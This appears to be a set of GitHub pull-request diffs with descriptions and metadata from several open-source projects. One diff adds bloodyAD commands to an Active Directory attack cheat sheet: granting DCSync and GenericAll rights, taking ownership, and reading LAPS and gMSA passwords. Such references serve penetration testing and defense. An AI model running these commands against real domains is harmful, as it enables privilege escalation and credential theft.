+ if lora_to_remove in lora_filenames:
+ lora_filenames.remove(lora_to_remove)
+
class A1111MetadataParser(MetadataParser):
def get_scheme(self) -> MetadataScheme:
@@ -397,12 +405,19 @@ def parse_json(self, metadata: str) -> dict:
data[key] = filename
break
- if 'lora_hashes' in data and data['lora_hashes'] != '':
+ lora_data = ''
+ if 'lora_weights' in data and data['lora_weights'] != '':
+ lora_data = data['lora_weights']
+ elif 'lora_hashes' in data and data['lora_hashes'] != '' and data['lora_hashes'].split(', ')[0].count(':') == 2:
+ lora_data = data['lora_hashes']
+
+ if lora_data != '':
lora_filenames = modules.config.lora_filenames.copy()
- if modules.config.sdxl_lcm_lora in lora_filenames:
- lora_filenames.remove(modules.config.sdxl_lcm_lora)
- for li, lora in enumerate(data['lora_hashes'].split(', ')):
- lora_name, lora_hash, lora_weight = lora.split(': ')
+ self.remove_special_loras(lora_filenames)
+ for li, lora in enumerate(lora_data.split(', ')):
+ lora_split = lora.split(': ')
+ lora_name = lora_split[0]
+ lora_weight = lora_split[2] if len(lora_split) == 3 else lora_split[1]
for filename in lora_filenames:
path = Path(filename)
if lora_name == path.stem:
@@ -453,11 +468,15 @@ def parse_string(self, metadata: dict) -> str:
if len(self.loras) > 0:
lora_hashes = []
+ lora_weights = []
for index, (lora_name, lora_weight, lora_hash) in enumerate(self.loras):
# workaround for Fooocus not knowing LoRA name in LoRA metadata
- lora_hashes.append(f'{lora_name}: {lora_hash}: {lora_weight}')
+ lora_hashes.append(f'{lora_name}: {lora_hash}')
+ lora_weights.append(f'{lora_name}: {lora_weight}')
lora_hashes_string = ', '.join(lora_hashes)
+ lora_weights_string = ', '.join(lora_weights)
generation_params[self.fooocus_to_a1111['lora_hashes']] = lora_hashes_string
+ generation_params[self.fooocus_to_a1111['lora_weights']] = lora_weights_string
generation_params[self.fooocus_to_a1111['version']] = data['version']
@@ -480,9 +499,7 @@ def get_scheme(self) -> MetadataScheme:
def parse_json(self, metadata: dict) -> dict:
model_filenames = modules.config.model_filenames.copy()
lora_filenames = modules.config.lora_filenames.copy()
- if modules.config.sdxl_lcm_lora in lora_filenames:
- lora_filenames.remove(modules.config.sdxl_lcm_lora)
-
+ self.remove_special_loras(lora_filenames)
for key, value in metadata.items():
if value in ['', 'None']:
continue
diff --git a/modules/util.py b/modules/util.py
index 7c46d946c..9e0fb294b 100644
--- a/modules/util.py
+++ b/modules/util.py
@@ -7,9 +7,9 @@
import os
import cv2
import json
+import hashlib
from PIL import Image
-from hashlib import sha256
import modules.sdxl_styles
@@ -182,16 +182,44 @@ def get_files_from_folder(folder_path, extensions=None, name_filter=None):
return filenames
-def calculate_sha256(filename, length=HASH_SHA256_LENGTH) -> str:
- hash_sha256 = sha256()
+def sha256(filename, use_addnet_hash=False, length=HASH_SHA256_LENGTH):
+ print(f"Calculating sha256 for {filename}: ", end='')
+ if use_addnet_hash:
+ with open(filename, "rb") as file:
+ sha256_value = addnet_hash_safetensors(file)
+ else:
+ sha256_value = calculate_sha256(filename)
+ print(f"{sha256_value}")
+
+ return sha256_value[:length] if length is not None else sha256_value
+
+
+def addnet_hash_safetensors(b):
+ """kohya-ss hash for safetensors from https://github.com/kohya-ss/sd-scripts/blob/main/library/train_util.py"""
+ hash_sha256 = hashlib.sha256()
+ blksize = 1024 * 1024
+
+ b.seek(0)
+ header = b.read(8)
+ n = int.from_bytes(header, "little")
+
+ offset = n + 8
+ b.seek(offset)
+ for chunk in iter(lambda: b.read(blksize), b""):
+ hash_sha256.update(chunk)
+
+ return hash_sha256.hexdigest()
+
+
+def calculate_sha256(filename) -> str:
+ hash_sha256 = hashlib.sha256()
blksize = 1024 * 1024
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(blksize), b""):
hash_sha256.update(chunk)
- res = hash_sha256.hexdigest()
- return res[:length] if length else res
+ return hash_sha256.hexdigest()
def quote(text):
|
fixes https://github.com/lllyasviel/Fooocus/issues/2600
|
https://api.github.com/repos/lllyasviel/Fooocus/pulls/2615
|
2024-03-23T15:26:49Z
|
2024-03-23T15:37:18Z
|
2024-03-23T15:37:18Z
|
2024-03-23T15:37:18Z
| 2,116
|
lllyasviel/Fooocus
| 7,077
|
Rollback voluptuous to 0.8.9
|
diff --git a/requirements_all.txt b/requirements_all.txt
index 2736313bca9684..998b42c36514ef 100644
--- a/requirements_all.txt
+++ b/requirements_all.txt
@@ -4,7 +4,7 @@ pyyaml>=3.11,<4
pytz>=2016.6.1
pip>=7.0.0
jinja2>=2.8
-voluptuous==0.9.1
+voluptuous==0.8.9
typing>=3,<4
sqlalchemy==1.0.14
diff --git a/setup.py b/setup.py
index 54867d5264e803..3d2d4b4e2c2d42 100755
--- a/setup.py
+++ b/setup.py
@@ -16,7 +16,7 @@
'pytz>=2016.6.1',
'pip>=7.0.0',
'jinja2>=2.8',
- 'voluptuous==0.9.1',
+ 'voluptuous==0.8.9',
'typing>=3,<4',
'sqlalchemy==1.0.14',
]
|
We've had several users report issues with upgrading to Home Assistant 0.25 because it would hang on the installation of voluptuous. We've traced down the problem but pending a fix we should rollback voluptuous to 0.8.9.
Issue that I raised with voluptuous: https://github.com/alecthomas/voluptuous/issues/189
|
https://api.github.com/repos/home-assistant/core/pulls/2687
|
2016-08-01T00:14:22Z
|
2016-08-01T00:20:08Z
|
2016-08-01T00:20:08Z
|
2017-03-17T18:35:04Z
| 266
|
home-assistant/core
| 38,666
|
Add train.py `--img-size` floor
|
diff --git a/train.py b/train.py
index b1afaf8ada7..9a844ebac0d 100644
--- a/train.py
+++ b/train.py
@@ -207,7 +207,7 @@ def train(hyp, # path/to/hyp.yaml or hyp dictionary
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
- imgsz = check_img_size(opt.imgsz, gs) # verify imgsz is gs-multiple
+ imgsz = check_img_size(opt.imgsz, gs, floor=gs * 2) # verify imgsz is gs-multiple
# DP mode
if cuda and RANK == -1 and torch.cuda.device_count() > 1:
diff --git a/utils/general.py b/utils/general.py
index 08a3ff6539b..fabd0f35fe9 100755
--- a/utils/general.py
+++ b/utils/general.py
@@ -181,11 +181,11 @@ def check_requirements(requirements='requirements.txt', exclude=()):
print(emojis(s)) # emoji-safe
-def check_img_size(img_size, s=32):
+def check_img_size(img_size, s=32, floor=0):
# Verify img_size is a multiple of stride s
- new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
+ new_size = max(make_divisible(img_size, int(s)), floor) # ceil gs-multiple
if new_size != img_size:
- print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
+ print(f'WARNING: --img-size {img_size} must be multiple of max stride {s}, updating to {new_size}')
return new_size
|
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Enhanced image size verification to ensure compatibility with the model's stride.
### 📊 Key Changes
- Modified the `check_img_size` function to include a `floor` argument.
- Adjusted the image size calculation to respect the new `floor` value alongside the maximum stride.
### 🎯 Purpose & Impact
- **Purpose**: Ensures that the input image size is not only a multiple of the model's stride but also not below a minimum size threshold, improving model compatibility.
- **Impact**: Users may notice a change in the minimum image size used for training, potentially leading to more consistent performance and avoiding errors related to incompatible image sizes. 📈🛠️
|
https://api.github.com/repos/ultralytics/yolov5/pulls/4099
|
2021-07-21T14:29:54Z
|
2021-07-21T14:50:47Z
|
2021-07-21T14:50:47Z
|
2024-01-19T16:49:35Z
| 436
|
ultralytics/yolov5
| 25,689
|
Use os.path.normcase to have Windows compatible challenge paths on Windows
|
diff --git a/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py b/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
index 28a72837000..8601e680480 100644
--- a/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
+++ b/certbot-ci/certbot_integration_tests/certbot_tests/test_main.py
@@ -148,6 +148,17 @@ def test_certonly(context):
"""Test the certonly verb on certbot."""
context.certbot(['certonly', '--cert-name', 'newname', '-d', context.get_domain('newname')])
+ assert_cert_count_for_lineage(context.config_dir, 'newname', 1)
+
+
+def test_certonly_webroot(context):
+ """Test the certonly verb with webroot plugin"""
+ with misc.create_http_server(context.http_01_port) as webroot:
+ certname = context.get_domain('webroot')
+ context.certbot(['certonly', '-a', 'webroot', '--webroot-path', webroot, '-d', certname])
+
+ assert_cert_count_for_lineage(context.config_dir, certname, 1)
+
def test_auth_and_install_with_csr(context):
"""Test certificate issuance and install using an existing CSR."""
diff --git a/certbot/certbot/_internal/plugins/webroot.py b/certbot/certbot/_internal/plugins/webroot.py
index 484d209d645..88e02998dde 100644
--- a/certbot/certbot/_internal/plugins/webroot.py
+++ b/certbot/certbot/_internal/plugins/webroot.py
@@ -157,7 +157,8 @@ def _create_challenge_dirs(self):
"--webroot-path and --domains, or --webroot-map. Run with "
" --help webroot for examples.")
for name, path in path_map.items():
- self.full_roots[name] = os.path.join(path, challenges.HTTP01.URI_ROOT_PATH)
+ self.full_roots[name] = os.path.join(path, os.path.normcase(
+ challenges.HTTP01.URI_ROOT_PATH))
logger.debug("Creating root challenges validation dir at %s",
self.full_roots[name])
|
Fixes #8597
|
https://api.github.com/repos/certbot/certbot/pulls/8599
|
2021-01-11T23:03:44Z
|
2021-01-13T22:38:58Z
|
2021-01-13T22:38:58Z
|
2021-01-13T22:38:58Z
| 494
|
certbot/certbot
| 2,138
|
Fix merge issues
|
diff --git a/g4f/Provider/bing/upload_image.py b/g4f/Provider/bing/upload_image.py
index 041905fdd9..d92451fa7a 100644
--- a/g4f/Provider/bing/upload_image.py
+++ b/g4f/Provider/bing/upload_image.py
@@ -3,17 +3,14 @@
import string
import random
import json
-import io
-import base64
import math
-from PIL import Image
from ...typing import ImageType
from aiohttp import ClientSession
from ...image import to_image, process_image, to_base64
image_config = {
"maxImagePixels": 360000,
- "imageComp.ssionRate": 0.7,
+ "imageCompressionRate": 0.7,
"enableFaceBlurDebug": 0,
}
diff --git a/g4f/gui/server/backend.py b/g4f/gui/server/backend.py
index 3ccd1a595e..9d12bea5f7 100644
--- a/g4f/gui/server/backend.py
+++ b/g4f/gui/server/backend.py
@@ -110,7 +110,8 @@ def try_response():
'provider': get_last_provider(True)
}) + "\n"
if isinstance(chunk, Exception):
- yield json.dumps({
+ logging.exception(chunk)
+ yield json.dumps({
'type' : 'message',
'message': get_error_message(chunk),
}) + "\n"
|
https://api.github.com/repos/xtekky/gpt4free/pulls/1463
|
2024-01-13T14:56:45Z
|
2024-01-13T14:57:00Z
|
2024-01-13T14:57:00Z
|
2024-01-13T14:57:00Z
| 324
|
xtekky/gpt4free
| 38,051
|
|
[MRG + 1] FIX work-around for read only dataframes
|
diff --git a/sklearn/utils/__init__.py b/sklearn/utils/__init__.py
index e6b38a3fe8fe8..b11feafacf405 100644
--- a/sklearn/utils/__init__.py
+++ b/sklearn/utils/__init__.py
@@ -12,7 +12,7 @@
assert_all_finite, warn_if_not_float,
check_random_state, column_or_1d, check_array,
check_consistent_length, check_X_y, indexable,
- check_symmetric)
+ check_symmetric, DataConversionWarning)
from .class_weight import compute_class_weight, compute_sample_weight
from ..externals.joblib import cpu_count
@@ -149,7 +149,14 @@ def safe_indexing(X, indices):
"""
if hasattr(X, "iloc"):
# Pandas Dataframes and Series
- return X.iloc[indices]
+ try:
+ return X.iloc[indices]
+ except ValueError:
+ # Cython typed memoryviews internally used in pandas do not support
+ # readonly buffers.
+ warnings.warn("Copying input dataframe for slicing.",
+ DataConversionWarning)
+ return X.copy().iloc[indices]
elif hasattr(X, "shape"):
if hasattr(X, 'take') and (hasattr(indices, 'dtype') and
indices.dtype.kind == 'i'):
diff --git a/sklearn/utils/tests/test_utils.py b/sklearn/utils/tests/test_utils.py
index 622335aacc805..19288fdd6e052 100644
--- a/sklearn/utils/tests/test_utils.py
+++ b/sklearn/utils/tests/test_utils.py
@@ -6,7 +6,7 @@
from sklearn.utils.testing import (assert_equal, assert_raises, assert_true,
assert_almost_equal, assert_array_equal,
- SkipTest)
+ SkipTest, assert_warns)
from sklearn.utils import check_random_state
from sklearn.utils import deprecated
@@ -17,6 +17,7 @@
from sklearn.utils import shuffle
from sklearn.utils.extmath import pinvh
from sklearn.utils.mocking import MockDataFrame
+from sklearn.utils.validation import DataConversionWarning
def test_make_rng():
@@ -167,6 +168,14 @@ def test_safe_indexing_pandas():
X_df_indexed = safe_indexing(X_df, inds)
X_indexed = safe_indexing(X_df, inds)
assert_array_equal(np.array(X_df_indexed), X_indexed)
+ # fun with read-only data in dataframes
+ # this happens in joblib memmapping
+ X.setflags(write=False)
+ X_df_readonly = pd.DataFrame(X)
+ X_df_ro_indexed = assert_warns(DataConversionWarning, safe_indexing,
+ X_df_readonly, inds)
+
+ assert_array_equal(np.array(X_df_ro_indexed), X_indexed)
def test_safe_indexing_mock_pandas():
|
Fixes the second part of #4597.
Currently I'm raising a DataConversionWarning, which is not really right. It should be a `DataCopyWarning` which we don't have yet. Do we want to add that? In light of #4660?
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/4678
|
2015-05-05T22:41:13Z
|
2015-05-06T14:05:16Z
|
2015-05-06T14:05:16Z
|
2017-05-19T20:46:16Z
| 635
|
scikit-learn/scikit-learn
| 46,753
|
Update bloodyAD attacks
|
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 4848f3d0e1..c15d1dab15 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -2856,10 +2856,10 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
* On Linux:
```bash
# Give DCSync right to the principal identity
- bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B addDomainSync user2
+ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2
# Remove right after DCSync
- bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B delDomainSync user2
+ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False
```
* WriteDACL on Group
@@ -2867,6 +2867,13 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
net group "INTERESTING_GROUP" User1 /add /domain
```
+ Or
+ ```powershell
+ bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp
+
+ # Remove right
+ bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
+ ```
#### WriteOwner
@@ -2875,6 +2882,10 @@ An attacker can update the owner of the target object. Once the object owner has
```powershell
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
```
+Or
+```powershell
+bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object
+```
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
@@ -2886,6 +2897,10 @@ An attacker can read the LAPS password of the computer account this ACE applies
```powershell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
```
+Or for a given computer
+```powershell
+bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
+```
#### ReadGMSAPassword
@@ -2900,6 +2915,10 @@ $mp = $gmsa.'msDS-ManagedPassword'
# Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp
```
+Or
+```powershell
+python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
#### ForceChangePassword
@@ -3953,4 +3972,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
-* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
\ No newline at end of file
+* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
|
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/536
|
2022-09-06T17:13:44Z
|
2022-09-06T17:32:21Z
|
2022-09-06T17:32:21Z
|
2022-11-07T10:51:13Z
| 1,231
|
swisskyrepo/PayloadsAllTheThings
| 8,300
|
|
#1149: Giving a fuck about ModuleNotFoundError
|
diff --git a/README.md b/README.md
index 5ac8b83ef..8aa2294d9 100644
--- a/README.md
+++ b/README.md
@@ -281,6 +281,7 @@ following rules are enabled by default:
* `pyenv_no_such_command` – fixes wrong pyenv commands like `pyenv isntall` or `pyenv list`;
* `python_command` – prepends `python` when you try to run non-executable/without `./` python script;
* `python_execute` – appends missing `.py` when executing Python files;
+* `python_module_error` – fixes ModuleNotFoundError by trying to `pip install` that module;
* `quotation_marks` – fixes uneven usage of `'` and `"` when containing args';
* `path_from_history` – replaces not found path with similar absolute path from history;
* `react_native_command_unrecognized` – fixes unrecognized `react-native` commands;
diff --git a/tests/rules/test_python_module_error.py b/tests/rules/test_python_module_error.py
new file mode 100644
index 000000000..838f9561a
--- /dev/null
+++ b/tests/rules/test_python_module_error.py
@@ -0,0 +1,63 @@
+import pytest
+
+from thefuck.rules.python_module_error import get_new_command, match
+from thefuck.types import Command
+
+
[email protected]
+def module_error_output(filename, module_name):
+ return """Traceback (most recent call last):
+ File "{0}", line 1, in <module>
+ import {1}
+ModuleNotFoundError: No module named '{1}'""".format(
+ filename, module_name
+ )
+
+
[email protected](
+ "test",
+ [
+ Command("python hello_world.py", "Hello World"),
+ Command(
+ "./hello_world.py",
+ """Traceback (most recent call last):
+ File "hello_world.py", line 1, in <module>
+ pritn("Hello World")
+NameError: name 'pritn' is not defined""",
+ ),
+ ],
+)
+def test_not_match(test):
+ assert not match(test)
+
+
+positive_tests = [
+ (
+ "python some_script.py",
+ "some_script.py",
+ "more_itertools",
+ "pip install more_itertools && python some_script.py",
+ ),
+ (
+ "./some_other_script.py",
+ "some_other_script.py",
+ "a_module",
+ "pip install a_module && ./some_other_script.py",
+ ),
+]
+
+
[email protected](
+ "script, filename, module_name, corrected_script", positive_tests
+)
+def test_match(script, filename, module_name, corrected_script, module_error_output):
+ assert match(Command(script, module_error_output))
+
+
[email protected](
+ "script, filename, module_name, corrected_script", positive_tests
+)
+def test_get_new_command(
+ script, filename, module_name, corrected_script, module_error_output
+):
+ assert get_new_command(Command(script, module_error_output)) == corrected_script
diff --git a/thefuck/rules/python_module_error.py b/thefuck/rules/python_module_error.py
new file mode 100644
index 000000000..4696d63b1
--- /dev/null
+++ b/thefuck/rules/python_module_error.py
@@ -0,0 +1,13 @@
+import re
+from thefuck.shells import shell
+
+MISSING_MODULE = r"ModuleNotFoundError: No module named '([^']+)'"
+
+
+def match(command):
+ return "ModuleNotFoundError: No module named '" in command.output
+
+
+def get_new_command(command):
+ missing_module = re.findall(MISSING_MODULE, command.output)[0]
+ return shell.and_("pip install {}".format(missing_module), command.script)
|
Closes #1149
|
https://api.github.com/repos/nvbn/thefuck/pulls/1151
|
2020-12-27T22:30:20Z
|
2021-01-19T21:37:06Z
|
2021-01-19T21:37:05Z
|
2021-01-19T21:41:43Z
| 886
|
nvbn/thefuck
| 30,606
|
Fix malformed string error for hashed_password
|
diff --git a/lib/ansible/modules/network/ios/ios_user.py b/lib/ansible/modules/network/ios/ios_user.py
index 8d675ac8d5a432..9969dc56525fe8 100644
--- a/lib/ansible/modules/network/ios/ios_user.py
+++ b/lib/ansible/modules/network/ios/ios_user.py
@@ -213,7 +213,6 @@
from copy import deepcopy
import re
-import ast
import base64
import hashlib
@@ -269,8 +268,8 @@ def add(command, want, x):
command.append('username %s %s' % (want['name'], x))
def add_hashed_password(command, want, x):
- command.append('username %s secret %s %s' % (want['name'], ast.literal_eval(x)['type'],
- ast.literal_eval(x)['value']))
+ command.append('username %s secret %s %s' % (want['name'], x.get('type'),
+ x.get('value')))
def add_ssh(command, want, x=None):
command.append('ip ssh pubkey-chain')
|
Signed-off-by: NilashishC <[email protected]>
##### SUMMARY
- Fixes malformed string error while attempting to set hashed_passwords on IOS devices
##### ISSUE TYPE
- Bugfix Pull Request
##### COMPONENT NAME
ios_user.py
|
https://api.github.com/repos/ansible/ansible/pulls/51007
|
2019-01-17T06:46:33Z
|
2019-01-17T07:35:50Z
|
2019-01-17T07:35:50Z
|
2019-07-22T17:56:47Z
| 246
|
ansible/ansible
| 48,919
|
Improve installation script for linux
|
diff --git a/start b/start
index 47368fb710..7b9d49fdde 100755
--- a/start
+++ b/start
@@ -36,27 +36,40 @@ function launchWithHungup() {
# get operating system name
os_name=`uname -s`
+# check command avalibility
+function has_command() {
+ command -v $1 > /dev/null
+}
+
# Install Packages
if [ $os_name = 'Linux' ]; then
- echo 'Install python-openssl and libnss3-tools for your system'
- if [ `which apt-get | wc -l` != 0 ]; then
- if [ `dpkg-query -l | grep python-openssl | wc -l` == 0 ]; then
- sudo apt-get install -y python-openssl
- fi
- elif [ `which dnf | wc -l` != 0 ]; then
- if [ `dnf -q list installed | grep pyOpenSSL | wc -l` == 0 ]; then
- sudo dnf install -y pyOpenSSL
- fi
- elif [ `which yum | wc -l` != 0 ]; then
- if [ `yum -q list installed | grep pyOpenSSL | wc -l` == 0 ]; then
- sudo yum install -y pyOpenSSL
- fi
- elif [ `which pacman | wc -l` != 0 ]; then
- if [ `pacman -Q | grep python2-pyopenssl | wc -l` == 0 ]; then
- sudo pacman -S --noconfirm openssl python2-pyopenssl
+ if ! python -c 'import OpenSSL' 2> /dev/null; then
+ echo 'You have not installed pyOpenSSL yet.'
+ if [[ $- == *i* ]]; then
+ # interactive shell
+ echo 'Installing pyOpenSSL for your system... Please type in your password if requested'
+ if has_command zypper; then
+ # openSUSE
+ sudo zypper in -y python-pyOpenSSL
+ elif has_command apt-get; then
+ # Debian or Debian-like
+ sudo apt-get install -y python-openssl
+ elif has_command dnf; then
+ # Fedora
+ sudo dnf install -y pyOpenSSL
+ elif has_command yum; then
+ # RedHat
+ sudo yum install -y pyOpenSSL
+ elif has_command pacman; then
+ # ArchLinux
+ sudo pacman -S --noconfirm openssl python2-pyopenssl
+ # Do Someting for OpenWRT
+ fi
+ else
+ # non-interactive shell
+ echo 1>&2 'Please install pyOpenSSL.'
+ exit 1
fi
- # Do Someting for OpenSUSE
- # Do Someting for OpenWRT
fi
elif [ $os_name = 'Darwin' ]; then
if [ `python -c 'import OpenSSL; print(OpenSSL.SSL.OPENSSL_VERSION_NUMBER > 0x1000200)' 2> /dev/null | grep True | wc -l` != 1 ]; then
|
Add script for openSUSE
only auto-install in interactive shell
把 openSUSE 的检测改到最前面是因为 openSUSE 自带了 apt-get 和 aptitude 两个 perl 脚本来转换并兼容部分 deb 系的命令……这样如果先检测 apt-get 的话可能有问题(不过我改了检测 pyOpenSSL 是否安装的方法之后目前顺序貌似不重要)。
|
https://api.github.com/repos/XX-net/XX-Net/pulls/3216
|
2016-05-04T16:36:06Z
|
2016-05-05T03:22:44Z
|
2016-05-05T03:22:44Z
|
2019-05-01T01:44:23Z
| 729
|
XX-net/XX-Net
| 17,260
|
Adding AWS SysOps Associate certification learning resources
|
diff --git a/certificates/aws-cloud-sysops-associate.md b/certificates/aws-cloud-sysops-associate.md
new file mode 100644
index 000000000..38fa3bd43
--- /dev/null
+++ b/certificates/aws-cloud-sysops-associate.md
@@ -0,0 +1,34 @@
+## AWS Cloud SysOps Administration Associate
+
+A summary of what you need to know for the exam can be found [here](https://aws.amazon.com/certification/certified-sysops-admin-associate)
+
+### <b> Who should take this exam? </b>
+<br>
+AWS Certified SysOps Administrator - Associate is intended for system administrators in cloud operations roles to validate technical skills.
+
+<summary>Before you take this exam, we recommend you have :</summary><br><b>
+
+ * A minimum of one year of hands-on experience with AWS technology
+ * Experience deploying, managing, and operating workloads on AWS as well as implementing security controls and compliance requirements
+ * Familiarity with using both the AWS Management Console and the AWS Command Line Interface (CLI)
+ * Understanding of the AWS Well-Architected Framework as well as AWS networking and security services
+</b>
+
+### <b> Prepare for your exam </b>
+<br>
+Get started with free resources or explore additional resources, including Official Practice Exams, with a subscription to AWS Skill Builder.
+
+ * AWS Cloud SysOps Guide (SOA-C02) [here](https://d1.awsstatic.com/training-and-certification/docs-sysops-associate/AWS-Certified-SysOps-Administrator-Associate_Exam-Guide.pdf)
+ * AWS Certified SysOps Administrator - Associate Official Practice Question Set (FREE) [here](https://explore.skillbuilder.aws/learn/course/external/view/elearning/12485/aws-certified-sysops-administrator-associate-practice-question-set-soa-c02-english?syops=sec&sec=prep)
+ * Exam Prep: AWS Certified SysOps Administrator - Associate (FREE) [here](https://explore.skillbuilder.aws/learn/course/external/view/elearning/9313/exam-prep-aws-certified-sysops-administrator-associate)
+
+ ### <b> Certification resource </b>
+ <br>
+ This is a resource for studying and preparing for the AWS Cloud SysOps Associate exam.
+
+ * Architecting for the cloud [here](https://d1.awsstatic.com/whitepapers/AWS_Cloud_Best_Practices.pdf)
+ * AWS Well-Architected Framework [here](https://d0.awsstatic.com/whitepapers/architecture/AWS_Well-Architected_Framework.pdf)
+ * Development and Test on Amazon Web Services [here](https://media.amazonwebservices.com/AWS_Development_Test_Environments.pdf)
+ * Backup, Archive, and Restore Approaches Using AWS [here](https://d0.awsstatic.com/whitepapers/Backup_Archive_and_Restore_Approaches_Using_AWS.pdf)
+ * How AWS Pricing Works - AWS Pricing Overview [here](https://d0.awsstatic.com/whitepapers/aws_pricing_overview.pdf)
+ * Sample Question AWS SOA-C02 [here](https://d1.awsstatic.com/training-and-certification/docs-sysops-associate/AWS-Certified-SysOps-Administrator-Associate_Sample-Questions.pdf)
\ No newline at end of file
|
Hello sir, I have added the AWS SysOps Associate certification study resource
|
https://api.github.com/repos/bregman-arie/devops-exercises/pulls/301
|
2022-10-11T16:55:26Z
|
2022-10-11T19:57:41Z
|
2022-10-11T19:57:41Z
|
2022-10-12T21:27:18Z
| 746
|
bregman-arie/devops-exercises
| 17,429
|
Fix nonsensical date in changelog
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 29590c34b..58a018454 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,7 +5,7 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
-## [13.5.1] - 2023-29-31
+## [13.5.1] - 2023-07-31
### Fixed
|
Clearly a typo
|
https://api.github.com/repos/Textualize/rich/pulls/3071
|
2023-07-31T10:26:37Z
|
2023-07-31T10:48:36Z
|
2023-07-31T10:48:36Z
|
2023-07-31T10:51:00Z
| 159
|
Textualize/rich
| 48,134
|
MAINT Try to fix [icc-build] in travis (+doc)
|
diff --git a/build_tools/travis/install.sh b/build_tools/travis/install.sh
index 84ceb8c4f6312..09f42e1aae96f 100755
--- a/build_tools/travis/install.sh
+++ b/build_tools/travis/install.sh
@@ -89,7 +89,7 @@ if [[ "$BUILD_WITH_ICC" == "true" ]]; then
sudo add-apt-repository "deb https://apt.repos.intel.com/oneapi all main"
sudo apt-get update
sudo apt-get install intel-oneapi-icc
- source /opt/intel/inteloneapi/setvars.sh
+ source /opt/intel/oneapi/setvars.sh
# The build_clib command is implicitly used to build libsvm-skl. To compile
# with a different compiler we also need to specify the compiler for this
diff --git a/build_tools/travis/test_docs.sh b/build_tools/travis/test_docs.sh
index 7246165a43767..08f08a7300bb9 100755
--- a/build_tools/travis/test_docs.sh
+++ b/build_tools/travis/test_docs.sh
@@ -3,12 +3,6 @@
set -e
set -x
-if [[ "$BUILD_WITH_ICC" == "true" ]]; then
- # the tools in the oneAPI toolkits are configured via environment variables
- # which are also required at runtime.
- source /opt/intel/inteloneapi/setvars.sh
-fi
-
if [[ "$TRAVIS_CPU_ARCH" != "arm64" ]]; then
PYTEST="pytest -n $CI_CPU_COUNT" make test-doc
fi
diff --git a/build_tools/travis/test_script.sh b/build_tools/travis/test_script.sh
index f9a3fd4774c36..fff4cc12c86d2 100755
--- a/build_tools/travis/test_script.sh
+++ b/build_tools/travis/test_script.sh
@@ -21,12 +21,6 @@ except ImportError:
python -c "import joblib; print(joblib.cpu_count(), 'CPUs')"
python -c "import platform; print(platform.machine())"
-if [[ "$BUILD_WITH_ICC" == "true" ]]; then
- # the tools in the oneAPI toolkits are configured via environment variables
- # which are also required at runtime.
- source /opt/intel/inteloneapi/setvars.sh
-fi
-
run_tests() {
TEST_CMD="pytest --showlocals --durations=20 --pyargs"
diff --git a/doc/developers/advanced_installation.rst b/doc/developers/advanced_installation.rst
index 6e682fec8c0dc..91b44cbafb348 100644
--- a/doc/developers/advanced_installation.rst
